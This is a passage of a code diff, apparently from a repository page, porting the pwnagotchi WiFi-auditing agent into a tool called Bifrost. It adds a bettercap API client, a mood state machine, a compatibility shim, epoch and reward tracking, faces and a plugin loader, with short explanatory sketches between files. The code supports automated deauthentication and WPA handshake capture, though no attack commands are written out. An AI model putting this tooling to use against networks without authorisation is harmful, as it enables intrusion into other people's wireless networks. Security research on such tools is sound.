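row = db.execute("SELECT COUNT(*), MAX(rssi) FROM bifrost_networks").fetchone()
print(row)
```

`ON CONFLICT ... DO UPDATE` requires SQLite 3.24+, which ships with any recent Python.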
def _persist_handshake(self, ap_mac, sta_mac, ap_name, filename):
try:
self.db.execute(
"""INSERT OR IGNORE INTO bifrost_handshakes
(ap_mac, sta_mac, ap_essid, filename)
VALUES (?, ?, ?, ?)""",
(ap_mac, sta_mac, ap_name, filename)
)
except Exception as e:
logger.debug("Error persisting handshake: %s", e)
def _persist_epoch(self, data):
try:
self.db.execute(
"""INSERT INTO bifrost_epochs
(epoch_num, started_at, duration_secs, num_deauths, num_assocs,
num_handshakes, num_hops, num_missed, num_peers, mood, reward,
cpu_load, mem_usage, temperature, meta_json)
VALUES (?, datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)""",
(self.epoch.epoch - 1, data.get('duration_secs', 0),
data.get('num_deauths', 0), data.get('num_associations', 0),
data.get('num_handshakes', 0), data.get('num_hops', 0),
data.get('missed_interactions', 0), data.get('num_peers', 0),
self.automata.mood, data.get('reward', 0),
data.get('cpu_load', 0), data.get('mem_usage', 0),
data.get('temperature', 0), '{}')
)
except Exception as e:
logger.debug("Error persisting epoch: %s", e)
def _log_activity(self, event_type, title, details=''):
"""Log an activity event to the DB."""
self.automata.voice_text = details or title
try:
self.db.execute(
"""INSERT INTO bifrost_activity (event_type, title, details)
VALUES (?, ?, ?)""",
(event_type, title, details)
)
except Exception as e:
logger.debug("Error logging activity: %s", e)

bifrost/automata.py (new file, 168 lines)

@@ -0,0 +1,168 @@
"""
Bifrost — Mood state machine.
Ported from pwnagotchi/automata.py.
"""
import logging
from bifrost import plugins as plugins
from bifrost.faces import MOOD_FACES
from logger import Logger
logger = Logger(name="bifrost.automata", level=logging.DEBUG)
class BifrostAutomata:
"""Evaluates epoch data and transitions between moods."""
def __init__(self, config):
self._config = config
self.mood = 'starting'
self.face = MOOD_FACES.get('starting', '(. .)')
self.voice_text = ''
self._peers = {} # peer_id -> peer_data
@property
def peers(self):
return self._peers
def _set_mood(self, mood):
self.mood = mood
self.face = MOOD_FACES.get(mood, '(. .)')
def set_starting(self):
self._set_mood('starting')
def set_ready(self):
self._set_mood('ready')
plugins.on('ready')
def _has_support_network_for(self, factor):
bond_factor = self._config.get('bifrost_personality_bond_factor', 20000)
total_encounters = sum(
p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
for p in self._peers.values()
)
support_factor = total_encounters / bond_factor
return support_factor >= factor
def in_good_mood(self):
return self._has_support_network_for(1.0)
def set_grateful(self):
self._set_mood('grateful')
plugins.on('grateful')
def set_lonely(self):
if not self._has_support_network_for(1.0):
logger.info("unit is lonely")
self._set_mood('lonely')
plugins.on('lonely')
else:
logger.info("unit is grateful instead of lonely")
self.set_grateful()
def set_bored(self, inactive_for):
bored_epochs = self._config.get('bifrost_personality_bored_epochs', 15)
factor = inactive_for / bored_epochs if bored_epochs else 1
if not self._has_support_network_for(factor):
logger.warning("%d epochs with no activity -> bored", inactive_for)
self._set_mood('bored')
plugins.on('bored')
else:
logger.info("unit is grateful instead of bored")
self.set_grateful()
def set_sad(self, inactive_for):
sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
factor = inactive_for / sad_epochs if sad_epochs else 1
if not self._has_support_network_for(factor):
logger.warning("%d epochs with no activity -> sad", inactive_for)
self._set_mood('sad')
plugins.on('sad')
else:
logger.info("unit is grateful instead of sad")
self.set_grateful()
def set_angry(self, factor):
if not self._has_support_network_for(factor):
logger.warning("too many misses -> angry (factor=%.1f)", factor)
self._set_mood('angry')
plugins.on('angry')
else:
logger.info("unit is grateful instead of angry")
self.set_grateful()
def set_excited(self):
logger.warning("lots of activity -> excited")
self._set_mood('excited')
plugins.on('excited')
def set_rebooting(self):
self._set_mood('broken')
plugins.on('rebooting')
def next_epoch(self, epoch):
"""Evaluate epoch state and transition mood.
Args:
epoch: BifrostEpoch instance
"""
was_stale = epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
did_miss = epoch.num_missed
# Trigger epoch transition (resets counters, computes reward)
epoch.next()
max_misses = self._config.get('bifrost_personality_max_misses', 8)
excited_threshold = self._config.get('bifrost_personality_excited_epochs', 10)
# Mood evaluation (same logic as pwnagotchi automata.py)
if was_stale:
factor = did_miss / max_misses if max_misses else 1
if factor >= 2.0:
self.set_angry(factor)
else:
logger.warning("agent missed %d interactions -> lonely", did_miss)
self.set_lonely()
elif epoch.sad_for:
sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
factor = epoch.inactive_for / sad_epochs if sad_epochs else 1
if factor >= 2.0:
self.set_angry(factor)
else:
self.set_sad(epoch.inactive_for)
elif epoch.bored_for:
self.set_bored(epoch.inactive_for)
elif epoch.active_for >= excited_threshold:
self.set_excited()
elif epoch.active_for >= 5 and self._has_support_network_for(5.0):
self.set_grateful()
plugins.on('epoch', epoch.epoch - 1, epoch.data())
def on_miss(self, who):
logger.info("it looks like %s is not in range anymore :/", who)
def on_error(self, who, e):
if 'is an unknown BSSID' in str(e):
self.on_miss(who)
else:
logger.error(str(e))
def is_stale(self, epoch):
return epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
def wait_for(self, t, epoch, sleeping=True, stop_event=None):
"""Wait and track sleep time.
If *stop_event* is provided the wait is interruptible so the
engine can shut down quickly even during long recon windows.
"""
plugins.on('sleep' if sleeping else 'wait', t)
epoch.track(sleep=True, inc=t)
import time
if stop_event is not None:
stop_event.wait(t)
else:
time.sleep(t)
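The "support network" check that gates the bored/sad/angry transitions reduces to a single ratio. A standalone sketch (the `has_support` name is illustrative; defaults match the config values above):

```python
# Sketch of _has_support_network_for(): total peer encounters divided by
# bond_factor must reach the requested threshold for the unit to stay
# grateful instead of turning lonely, bored, sad, or angry.
def has_support(peers, factor, bond_factor=20000):
    total = sum(p.get('encounters', 0) for p in peers.values())
    return (total / bond_factor) >= factor

peers = {'unit1': {'encounters': 30000}, 'unit2': {'encounters': 10000}}
print(has_support(peers, 1.0))  # support factor 40000/20000 = 2.0
print(has_support(peers, 3.0))  # threshold not reached
```

With the default `bond_factor` of 20000, a unit needs 20000 cumulative peer encounters per unit of threshold, so negative moods get progressively harder to trigger as the unit bonds with peers.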

bifrost/bettercap.py (new file, 103 lines)

@@ -0,0 +1,103 @@
"""
Bifrost — Bettercap REST API client.
Ported from pwnagotchi/bettercap.py using urllib (no requests dependency).
"""
import json
import logging
import base64
import urllib.request
import urllib.error
from logger import Logger
logger = Logger(name="bifrost.bettercap", level=logging.DEBUG)
class BettercapClient:
"""Synchronous REST client for the bettercap API."""
def __init__(self, hostname='127.0.0.1', scheme='http', port=8081,
username='user', password='pass'):
self.hostname = hostname
self.scheme = scheme
self.port = port
self.username = username
self.password = password
self.url = "%s://%s:%d/api" % (scheme, hostname, port)
self.websocket = "ws://%s:%s@%s:%d/api" % (username, password, hostname, port)
self._auth_header = 'Basic ' + base64.b64encode(
('%s:%s' % (username, password)).encode()
).decode()
def _request(self, method, path, data=None, verbose_errors=True):
"""Make an HTTP request to bettercap API."""
url = "%s%s" % (self.url, path)
body = json.dumps(data).encode() if data else None
req = urllib.request.Request(url, data=body, method=method)
req.add_header('Authorization', self._auth_header)
if body:
req.add_header('Content-Type', 'application/json')
try:
with urllib.request.urlopen(req, timeout=10) as resp:
raw = resp.read().decode('utf-8')
try:
return json.loads(raw)
except json.JSONDecodeError:
return raw
except urllib.error.HTTPError as e:
err = "error %d: %s" % (e.code, e.read().decode('utf-8', errors='replace').strip())
if verbose_errors:
logger.info(err)
raise Exception(err)
except urllib.error.URLError as e:
raise Exception("bettercap unreachable: %s" % e.reason)
def session(self):
"""GET /api/session — current bettercap state."""
return self._request('GET', '/session')
def run(self, command, verbose_errors=True):
"""POST /api/session — execute a bettercap command."""
return self._request('POST', '/session', {'cmd': command},
verbose_errors=verbose_errors)
def events(self):
"""GET /api/events — poll recent events (REST fallback)."""
try:
result = self._request('GET', '/events', verbose_errors=False)
# Clear after reading so we don't reprocess
try:
self.run('events.clear', verbose_errors=False)
except Exception:
pass
return result if isinstance(result, list) else []
except Exception:
return []
async def start_websocket(self, consumer, stop_event=None):
"""Connect to bettercap websocket event stream.
Args:
consumer: async callable that receives each message string.
stop_event: optional threading.Event — exit when set.
"""
import websockets
import asyncio
ws_url = "%s/events" % self.websocket
while not (stop_event and stop_event.is_set()):
try:
async with websockets.connect(ws_url, ping_interval=60,
ping_timeout=90) as ws:
async for msg in ws:
if stop_event and stop_event.is_set():
return
try:
await consumer(msg)
except Exception as ex:
logger.debug("Error parsing event: %s", ex)
except Exception as ex:
if stop_event and stop_event.is_set():
return
logger.debug("Websocket error: %s — reconnecting...", ex)
await asyncio.sleep(2)
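The Basic-auth header the client builds in `__init__` can be reproduced standalone (credentials below are the defaults from the config, not secrets):

```python
import base64

# How BettercapClient derives its Authorization header: standard HTTP
# Basic auth, i.e. base64 of "username:password".
def auth_header(username, password):
    token = base64.b64encode(('%s:%s' % (username, password)).encode()).decode()
    return 'Basic ' + token

print(auth_header('user', 'pass'))
```

Precomputing the header once in the constructor avoids re-encoding on every `_request` call.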

bifrost/compat.py (new file, 185 lines)

@@ -0,0 +1,185 @@
"""
Bifrost — Pwnagotchi compatibility shim.
Registers `pwnagotchi` in sys.modules so existing plugins can
`import pwnagotchi` and get Bifrost-backed implementations.
"""
import sys
import time
import types
import os
def install_shim(shared_data, bifrost_plugins_module):
"""Install the pwnagotchi namespace shim into sys.modules.
Call this BEFORE loading any pwnagotchi plugins so their
`import pwnagotchi` resolves to our shim.
"""
_start_time = time.time()
# Create the fake pwnagotchi module
pwn = types.ModuleType('pwnagotchi')
pwn.__version__ = '2.0.0-bifrost'
pwn.__file__ = __file__
pwn.config = _build_compat_config(shared_data)
def _name():
return shared_data.config.get('bjorn_name', 'bifrost')
def _set_name(n):
pass # no-op, name comes from Bjorn config
def _uptime():
return time.time() - _start_time
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0
def _reboot():
pass # no-op in Bifrost — we don't auto-reboot
pwn.name = _name
pwn.set_name = _set_name
pwn.uptime = _uptime
pwn.cpu_load = _cpu_load
pwn.mem_usage = _mem_usage
pwn.temperature = _temperature
pwn.reboot = _reboot
# Register modules
sys.modules['pwnagotchi'] = pwn
sys.modules['pwnagotchi.plugins'] = bifrost_plugins_module
sys.modules['pwnagotchi.utils'] = _build_utils_shim(shared_data)
def _build_compat_config(shared_data):
"""Translate Bjorn's flat bifrost_* config to pwnagotchi's nested format."""
cfg = shared_data.config
return {
'main': {
'name': cfg.get('bjorn_name', 'bifrost'),
'iface': cfg.get('bifrost_iface', 'wlan0mon'),
'mon_start_cmd': '',
'no_restart': False,
'filter': cfg.get('bifrost_filter', ''),
'whitelist': [
w.strip() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
],
'plugins': cfg.get('bifrost_plugins', {}),
'custom_plugins': cfg.get('bifrost_plugins_path', ''),
'mon_max_blind_epochs': 50,
},
'personality': {
'ap_ttl': cfg.get('bifrost_personality_ap_ttl', 120),
'sta_ttl': cfg.get('bifrost_personality_sta_ttl', 300),
'min_rssi': cfg.get('bifrost_personality_min_rssi', -200),
'associate': cfg.get('bifrost_personality_associate', True),
'deauth': cfg.get('bifrost_personality_deauth', True),
'recon_time': cfg.get('bifrost_personality_recon_time', 30),
'hop_recon_time': cfg.get('bifrost_personality_hop_recon_time', 10),
'min_recon_time': cfg.get('bifrost_personality_min_recon_time', 5),
'max_inactive_scale': 3,
'recon_inactive_multiplier': 2,
'max_interactions': cfg.get('bifrost_personality_max_interactions', 3),
'max_misses_for_recon': cfg.get('bifrost_personality_max_misses', 8),
'excited_num_epochs': cfg.get('bifrost_personality_excited_epochs', 10),
'bored_num_epochs': cfg.get('bifrost_personality_bored_epochs', 15),
'sad_num_epochs': cfg.get('bifrost_personality_sad_epochs', 25),
'bond_encounters_factor': cfg.get('bifrost_personality_bond_factor', 20000),
'channels': [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
],
},
'bettercap': {
'hostname': cfg.get('bifrost_bettercap_host', '127.0.0.1'),
'scheme': 'http',
'port': cfg.get('bifrost_bettercap_port', 8081),
'username': cfg.get('bifrost_bettercap_user', 'user'),
'password': cfg.get('bifrost_bettercap_pass', 'pass'),
'handshakes': cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes'),
'silence': [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
],
},
'ai': {
'enabled': cfg.get('bifrost_ai_enabled', False),
'path': '/root/bifrost/brain.json',
},
'ui': {
'fps': 1.0,
'web': {'enabled': False},
'display': {'enabled': False},
},
}
def _build_utils_shim(shared_data):
"""Minimal pwnagotchi.utils shim."""
mod = types.ModuleType('pwnagotchi.utils')
def secs_to_hhmmss(secs):
h = int(secs // 3600)
m = int((secs % 3600) // 60)
s = int(secs % 60)
return "%d:%02d:%02d" % (h, m, s)
def iface_channels(iface):
"""Return available channels for interface."""
try:
import subprocess
out = subprocess.check_output(
['iwlist', iface, 'channel'],
stderr=subprocess.DEVNULL, timeout=5
).decode()
channels = []
for line in out.split('\n'):
if 'Channel' in line and 'Current' not in line:
parts = line.strip().split()
for p in parts:
try:
ch = int(p)
if 1 <= ch <= 14:
channels.append(ch)
except ValueError:
continue
return sorted(set(channels)) if channels else list(range(1, 15))
except Exception:
return list(range(1, 15))
def total_unique_handshakes(path):
"""Count unique handshake files in directory."""
import glob as _glob
if not os.path.isdir(path):
return 0
return len(_glob.glob(os.path.join(path, '*.pcap')))
mod.secs_to_hhmmss = secs_to_hhmmss
mod.iface_channels = iface_channels
mod.total_unique_handshakes = total_unique_handshakes
return mod
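The compatibility layer above works by registering synthetic modules in `sys.modules`, so that unmodified third-party pwnagotchi plugins can `import pwnagotchi` without the real package being installed. A minimal standalone sketch of that technique (names here are illustrative, not the full shim):

```python
import sys
import time
import types

_start_time = time.time()

# Build a synthetic module object and register it under the name that
# third-party code will import. Any later `import pwnagotchi` in this
# interpreter resolves to this object — no package on disk is needed.
pwn = types.ModuleType('pwnagotchi')
pwn.name = lambda: 'bifrost'
pwn.uptime = lambda: time.time() - _start_time
sys.modules['pwnagotchi'] = pwn

import pwnagotchi  # resolves to the shim registered above
print(pwnagotchi.name())            # -> bifrost
print(pwnagotchi.uptime() >= 0.0)   # -> True
```

The real shim additionally registers `pwnagotchi.plugins` and `pwnagotchi.utils` submodule entries, since `import pwnagotchi.utils` looks up the dotted name in `sys.modules` directly.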

bifrost/epoch.py Normal file

@@ -0,0 +1,292 @@
"""
Bifrost — Epoch tracking.
Ported from pwnagotchi/ai/epoch.py + pwnagotchi/ai/reward.py.
"""
import time
import threading
import logging
import os
from logger import Logger
logger = Logger(name="bifrost.epoch", level=logging.DEBUG)
NUM_CHANNELS = 14 # 2.4 GHz channels
# ── Reward function (from pwnagotchi/ai/reward.py) ──────────────
class RewardFunction:
"""Reward signal for RL — higher is better."""
def __call__(self, epoch_n, state):
eps = 1e-20
tot_epochs = epoch_n + eps
tot_interactions = max(
state['num_deauths'] + state['num_associations'],
state['num_handshakes']
) + eps
tot_channels = NUM_CHANNELS
# Positive signals
h = state['num_handshakes'] / tot_interactions
a = 0.2 * (state['active_for_epochs'] / tot_epochs)
c = 0.1 * (state['num_hops'] / tot_channels)
# Negative signals
b = -0.3 * (state['blind_for_epochs'] / tot_epochs)
m = -0.3 * (state['missed_interactions'] / tot_interactions)
i = -0.2 * (state['inactive_for_epochs'] / tot_epochs)
_sad = state['sad_for_epochs'] if state['sad_for_epochs'] >= 5 else 0
_bored = state['bored_for_epochs'] if state['bored_for_epochs'] >= 5 else 0
s = -0.2 * (_sad / tot_epochs)
l_val = -0.1 * (_bored / tot_epochs)
return h + a + c + b + i + m + s + l_val
# ── Epoch state ──────────────────────────────────────────────────
class BifrostEpoch:
"""Tracks per-epoch counters, observations, and reward."""
def __init__(self, config):
self.epoch = 0
self.config = config
# Consecutive epoch counters
self.inactive_for = 0
self.active_for = 0
self.blind_for = 0
self.sad_for = 0
self.bored_for = 0
# Per-epoch action flags & counters
self.did_deauth = False
self.num_deauths = 0
self.did_associate = False
self.num_assocs = 0
self.num_missed = 0
self.did_handshakes = False
self.num_shakes = 0
self.num_hops = 0
self.num_slept = 0
self.num_peers = 0
self.tot_bond_factor = 0.0
self.avg_bond_factor = 0.0
self.any_activity = False
# Timing
self.epoch_started = time.time()
self.epoch_duration = 0
# Channel histograms for AI observation
self.non_overlapping_channels = {1: 0, 6: 0, 11: 0}
self._observation = {
'aps_histogram': [0.0] * NUM_CHANNELS,
'sta_histogram': [0.0] * NUM_CHANNELS,
'peers_histogram': [0.0] * NUM_CHANNELS,
}
self._observation_ready = threading.Event()
self._epoch_data = {}
self._epoch_data_ready = threading.Event()
self._reward = RewardFunction()
def wait_for_epoch_data(self, with_observation=True, timeout=None):
self._epoch_data_ready.wait(timeout)
self._epoch_data_ready.clear()
if with_observation:
return {**self._observation, **self._epoch_data}
return self._epoch_data
def data(self):
return self._epoch_data
def observe(self, aps, peers):
"""Update observation histograms from current AP/peer lists."""
num_aps = len(aps)
if num_aps == 0:
self.blind_for += 1
else:
self.blind_for = 0
bond_unit_scale = self.config.get('bifrost_personality_bond_factor', 20000)
self.num_peers = len(peers)
num_peers = self.num_peers + 1e-10
self.tot_bond_factor = sum(
p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
for p in peers
) / bond_unit_scale
self.avg_bond_factor = self.tot_bond_factor / num_peers
num_aps_f = len(aps) + 1e-10
num_sta = sum(len(ap.get('clients', [])) for ap in aps) + 1e-10
aps_per_chan = [0.0] * NUM_CHANNELS
sta_per_chan = [0.0] * NUM_CHANNELS
peers_per_chan = [0.0] * NUM_CHANNELS
for ap in aps:
ch_idx = ap.get('channel', 1) - 1
if 0 <= ch_idx < NUM_CHANNELS:
aps_per_chan[ch_idx] += 1.0
sta_per_chan[ch_idx] += len(ap.get('clients', []))
for peer in peers:
ch = peer.get('last_channel', 0) if isinstance(peer, dict) else getattr(peer, 'last_channel', 0)
ch_idx = ch - 1
if 0 <= ch_idx < NUM_CHANNELS:
peers_per_chan[ch_idx] += 1.0
# Normalize
aps_per_chan = [e / num_aps_f for e in aps_per_chan]
sta_per_chan = [e / num_sta for e in sta_per_chan]
peers_per_chan = [e / num_peers for e in peers_per_chan]
self._observation = {
'aps_histogram': aps_per_chan,
'sta_histogram': sta_per_chan,
'peers_histogram': peers_per_chan,
}
self._observation_ready.set()
def track(self, deauth=False, assoc=False, handshake=False,
hop=False, sleep=False, miss=False, inc=1):
"""Increment epoch counters."""
if deauth:
self.num_deauths += inc
self.did_deauth = True
self.any_activity = True
if assoc:
self.num_assocs += inc
self.did_associate = True
self.any_activity = True
if miss:
self.num_missed += inc
if hop:
self.num_hops += inc
# Reset per-channel flags on hop
self.did_deauth = False
self.did_associate = False
if handshake:
self.num_shakes += inc
self.did_handshakes = True
if sleep:
self.num_slept += inc
def next(self):
"""Transition to next epoch — compute reward, update streaks, reset counters."""
# Update activity streaks
if not self.any_activity and not self.did_handshakes:
self.inactive_for += 1
self.active_for = 0
else:
self.active_for += 1
self.inactive_for = 0
self.sad_for = 0
self.bored_for = 0
sad_threshold = self.config.get('bifrost_personality_sad_epochs', 25)
bored_threshold = self.config.get('bifrost_personality_bored_epochs', 15)
if self.inactive_for >= sad_threshold:
self.bored_for = 0
self.sad_for += 1
elif self.inactive_for >= bored_threshold:
self.sad_for = 0
self.bored_for += 1
else:
self.sad_for = 0
self.bored_for = 0
now = time.time()
self.epoch_duration = now - self.epoch_started
# System metrics
cpu = _cpu_load()
mem = _mem_usage()
temp = _temperature()
# Cache epoch data for other threads
self._epoch_data = {
'duration_secs': self.epoch_duration,
'slept_for_secs': self.num_slept,
'blind_for_epochs': self.blind_for,
'inactive_for_epochs': self.inactive_for,
'active_for_epochs': self.active_for,
'sad_for_epochs': self.sad_for,
'bored_for_epochs': self.bored_for,
'missed_interactions': self.num_missed,
'num_hops': self.num_hops,
'num_peers': self.num_peers,
'tot_bond': self.tot_bond_factor,
'avg_bond': self.avg_bond_factor,
'num_deauths': self.num_deauths,
'num_associations': self.num_assocs,
'num_handshakes': self.num_shakes,
'cpu_load': cpu,
'mem_usage': mem,
'temperature': temp,
}
self._epoch_data['reward'] = self._reward(self.epoch + 1, self._epoch_data)
self._epoch_data_ready.set()
logger.info(
"[epoch %d] dur=%ds blind=%d sad=%d bored=%d inactive=%d active=%d "
"hops=%d missed=%d deauths=%d assocs=%d shakes=%d reward=%.3f",
self.epoch, int(self.epoch_duration), self.blind_for,
self.sad_for, self.bored_for, self.inactive_for, self.active_for,
self.num_hops, self.num_missed, self.num_deauths, self.num_assocs,
self.num_shakes, self._epoch_data['reward'],
)
# Reset for next epoch
self.epoch += 1
self.epoch_started = now
self.did_deauth = False
self.num_deauths = 0
self.num_peers = 0
self.tot_bond_factor = 0.0
self.avg_bond_factor = 0.0
self.did_associate = False
self.num_assocs = 0
self.num_missed = 0
self.did_handshakes = False
self.num_shakes = 0
self.num_hops = 0
self.num_slept = 0
self.any_activity = False
# ── System metric helpers ────────────────────────────────────────
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0
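To see how the reward function above ranks epochs, here is a standalone copy of the same formula applied to two hypothetical epoch states: one that captured handshakes while active, and one spent blind and inactive. The state dicts are invented for illustration.

```python
# Standalone copy of RewardFunction.__call__ from epoch.py.
NUM_CHANNELS = 14

def reward(epoch_n, state):
    eps = 1e-20
    tot_epochs = epoch_n + eps
    tot_interactions = max(
        state['num_deauths'] + state['num_associations'],
        state['num_handshakes']) + eps
    h = state['num_handshakes'] / tot_interactions
    a = 0.2 * (state['active_for_epochs'] / tot_epochs)
    c = 0.1 * (state['num_hops'] / NUM_CHANNELS)
    b = -0.3 * (state['blind_for_epochs'] / tot_epochs)
    m = -0.3 * (state['missed_interactions'] / tot_interactions)
    i = -0.2 * (state['inactive_for_epochs'] / tot_epochs)
    _sad = state['sad_for_epochs'] if state['sad_for_epochs'] >= 5 else 0
    _bored = state['bored_for_epochs'] if state['bored_for_epochs'] >= 5 else 0
    s = -0.2 * (_sad / tot_epochs)
    l_val = -0.1 * (_bored / tot_epochs)
    return h + a + c + b + i + m + s + l_val

base = dict(num_deauths=0, num_associations=0, num_handshakes=0,
            active_for_epochs=0, num_hops=0, blind_for_epochs=0,
            missed_interactions=0, inactive_for_epochs=0,
            sad_for_epochs=0, bored_for_epochs=0)

# Productive epoch: 4 handshakes out of 5 interactions, active, hopping.
good = {**base, 'num_deauths': 2, 'num_associations': 3,
        'num_handshakes': 4, 'active_for_epochs': 1, 'num_hops': 5}
# Wasted epoch: saw no APs, did nothing.
bad = {**base, 'blind_for_epochs': 1, 'inactive_for_epochs': 1}

print(reward(1, good) > 0 > reward(1, bad))  # -> True
```

Note that `sad_for_epochs` and `bored_for_epochs` only start penalizing once they reach 5, so short lulls do not drag the reward down.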

bifrost/faces.py Normal file

@@ -0,0 +1,66 @@
"""
Bifrost — ASCII face definitions.
Ported from pwnagotchi/ui/faces.py with full face set.
"""
LOOK_R = '( \u2686_\u2686)'
LOOK_L = '(\u2609_\u2609 )'
LOOK_R_HAPPY = '( \u25d5\u203f\u25d5)'
LOOK_L_HAPPY = '(\u25d5\u203f\u25d5 )'
SLEEP = '(\u21c0\u203f\u203f\u21bc)'
SLEEP2 = '(\u2256\u203f\u203f\u2256)'
AWAKE = '(\u25d5\u203f\u203f\u25d5)'
BORED = '(-__-)'
INTENSE = '(\u00b0\u25c3\u25c3\u00b0)'
COOL = '(\u2310\u25a0_\u25a0)'
HAPPY = '(\u2022\u203f\u203f\u2022)'
GRATEFUL = '(^\u203f\u203f^)'
EXCITED = '(\u1d54\u25e1\u25e1\u1d54)'
MOTIVATED = '(\u263c\u203f\u203f\u263c)'
DEMOTIVATED = '(\u2256__\u2256)'
SMART = '(\u271c\u203f\u203f\u271c)'
LONELY = '(\u0628__\u0628)'
SAD = '(\u2565\u2601\u2565 )'
ANGRY = "(-_-')"
FRIEND = '(\u2665\u203f\u203f\u2665)'
BROKEN = '(\u2613\u203f\u203f\u2613)'
DEBUG = '(#__#)'
UPLOAD = '(1__0)'
UPLOAD1 = '(1__1)'
UPLOAD2 = '(0__1)'
STARTING = '(. .)'
READY = '( ^_^)'
# Map mood name → face constant
MOOD_FACES = {
'starting': STARTING,
'ready': READY,
'sleeping': SLEEP,
'awake': AWAKE,
'bored': BORED,
'sad': SAD,
'angry': ANGRY,
'excited': EXCITED,
'lonely': LONELY,
'grateful': GRATEFUL,
'happy': HAPPY,
'cool': COOL,
'intense': INTENSE,
'motivated': MOTIVATED,
'demotivated': DEMOTIVATED,
'friend': FRIEND,
'broken': BROKEN,
'debug': DEBUG,
'smart': SMART,
}
def load_from_config(config):
"""Override faces from config dict (e.g. custom emojis)."""
for face_name, face_value in (config or {}).items():
key = face_name.upper()
if key in globals():
globals()[key] = face_value
lower = face_name.lower()
if lower in MOOD_FACES:
MOOD_FACES[lower] = face_value
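`load_from_config` relies on mutating module-level constants through `globals()`, so code that reads the constants by name at call time picks up custom faces. A self-contained sketch of that trick (only `HAPPY` is modeled here):

```python
# Module-level constant plus a lookup table, mirroring faces.py.
HAPPY = '(\u2022\u203f\u203f\u2022)'
MOOD_FACES = {'happy': HAPPY}

def load_from_config(config):
    # Rebind the module-level name AND patch the mood table, exactly
    # as faces.load_from_config does.
    for face_name, face_value in (config or {}).items():
        key = face_name.upper()
        if key in globals():
            globals()[key] = face_value
        lower = face_name.lower()
        if lower in MOOD_FACES:
            MOOD_FACES[lower] = face_value

load_from_config({'happy': '^_^'})
print(HAPPY, MOOD_FACES['happy'])  # -> ^_^ ^_^
```

One caveat of this pattern: a consumer that did `from faces import HAPPY` before the override keeps the old string, because the import copied the binding; reading `faces.HAPPY` (or the `MOOD_FACES` dict) always sees the current value.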

bifrost/plugins.py Normal file

@@ -0,0 +1,198 @@
"""
Bifrost — Plugin system.
Ported from pwnagotchi/plugins/__init__.py with ThreadPoolExecutor.
Compatible with existing pwnagotchi plugin files.
"""
import os
import glob
import threading
import importlib
import importlib.util
import logging
import concurrent.futures
from logger import Logger
logger = Logger(name="bifrost.plugins", level=logging.DEBUG)
default_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "plugins")
loaded = {}
database = {}
locks = {}
_executor = concurrent.futures.ThreadPoolExecutor(
max_workers=4, thread_name_prefix="BifrostPlugin"
)
class Plugin:
"""Base class for Bifrost/Pwnagotchi plugins.
Subclasses are auto-registered via __init_subclass__.
"""
__author__ = 'unknown'
__version__ = '0.0.0'
__license__ = 'GPL3'
__description__ = ''
__name__ = ''
__help__ = ''
__dependencies__ = []
__defaults__ = {}
def __init__(self):
self.options = {}
@classmethod
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
global loaded, locks
plugin_name = cls.__module__.split('.')[0]
plugin_instance = cls()
logger.debug("loaded plugin %s as %s", plugin_name, plugin_instance)
loaded[plugin_name] = plugin_instance
for attr_name in dir(plugin_instance):
if attr_name.startswith('on_'):
cb = getattr(plugin_instance, attr_name, None)
if cb is not None and callable(cb):
locks["%s::%s" % (plugin_name, attr_name)] = threading.Lock()
def toggle_plugin(name, enable=True):
"""Enable or disable a plugin at runtime. Returns True if state changed."""
global loaded, database
if not enable and name in loaded:
try:
if hasattr(loaded[name], 'on_unload'):
loaded[name].on_unload()
except Exception as e:
logger.warning("Error unloading plugin %s: %s", name, e)
del loaded[name]
return True
if enable and name in database and name not in loaded:
try:
load_from_file(database[name])
if name in loaded:
one(name, 'loaded')
return True
except Exception as e:
logger.warning("Error loading plugin %s: %s", name, e)
return False
def on(event_name, *args, **kwargs):
"""Dispatch event to ALL loaded plugins."""
for plugin_name in list(loaded.keys()):
one(plugin_name, event_name, *args, **kwargs)
def _locked_cb(lock_name, cb, *args, **kwargs):
    """Execute callback under its per-plugin lock."""
    global locks
    if lock_name not in locks:
        locks[lock_name] = threading.Lock()
    with locks[lock_name]:
        try:
            cb(*args, **kwargs)
        except Exception as e:
            # An exception raised inside an executor-submitted callable is
            # stored on the Future and never re-raised, so log it here
            # instead of letting it vanish silently.
            logger.error("error running %s: %s", lock_name, e)
def one(plugin_name, event_name, *args, **kwargs):
"""Dispatch event to a single plugin (thread-safe)."""
global loaded
if plugin_name in loaded:
plugin = loaded[plugin_name]
cb_name = 'on_%s' % event_name
callback = getattr(plugin, cb_name, None)
if callback is not None and callable(callback):
try:
lock_name = "%s::%s" % (plugin_name, cb_name)
_executor.submit(_locked_cb, lock_name, callback, *args, **kwargs)
except Exception as e:
logger.error("error running %s.%s: %s", plugin_name, cb_name, e)
def load_from_file(filename):
"""Load a single plugin file."""
logger.debug("loading %s", filename)
plugin_name = os.path.basename(filename.replace(".py", ""))
